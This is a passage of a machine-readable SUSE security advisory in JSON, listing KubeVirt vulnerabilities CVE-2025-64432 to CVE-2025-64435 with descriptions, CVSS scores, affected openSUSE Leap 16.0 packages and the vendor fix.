"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, because of the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance could exploit the shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances, potentially compromising the integrity and availability of the VMs they manage. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt control of a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
